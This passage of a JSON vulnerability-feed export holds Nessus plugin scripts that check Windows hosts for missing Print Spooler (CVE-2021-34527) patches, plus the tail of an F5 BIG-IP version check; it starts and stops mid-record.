! get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K03009991';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'APM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AVR': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LC': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:00", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004945: Windows 10 2004 / 20H2 / 21H1 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004945.NASL", "href": "https://www.tenable.com/plugins/nessus/151471", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151471);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004945\");\n script_xref(name:\"MSFT\", value:\"MS21-5004945\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004945: Windows 10 2004 / 20H2 / 21H1 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \n operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004945\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004945\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004945'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'19041',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945])\n|| \nsmb_check_rollup(os:'10', \n sp:0,\n os_build:'19042',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945]\n)\n|| \nsmb_check_rollup(os:'10', \n sp:0,\n os_build:'19043',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945]\n)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004947: Windows 10 1809 and Windows Server 2019 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004947.NASL", "href": "https://www.tenable.com/plugins/nessus/151473", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151473);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004947\");\n script_xref(name:\"MSFT\", value:\"MS21-5004947\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004947: Windows 10 1809 and Windows Server 2019 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004947\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004947\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004947'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'17763',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004947])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004950: Windows 10 1507 LTS OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004950.NASL", "href": "https://www.tenable.com/plugins/nessus/151475", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151475);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004950\");\n script_xref(name:\"MSFT\", value:\"MS21-5004950\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004950: Windows 10 1507 LTS OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004950\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004950\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004950'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'10240',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004950])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:55", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004946: Windows 10 1909 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004946.NASL", "href": "https://www.tenable.com/plugins/nessus/151472", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151472);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004946\");\n script_xref(name:\"MSFT\", value:\"MS21-5004946\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004946: Windows 10 1909 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004946\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004946\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004946'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'18363',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004946])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004959: Windows Server 2008 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004959.NASL", "href": "https://www.tenable.com/plugins/nessus/151478", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151478);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004959\");\n script_xref(name:\"MSFT\", value:\"MS21-5004959\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004959: Windows Server 2008 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004959\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004959\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004959'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004959])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM 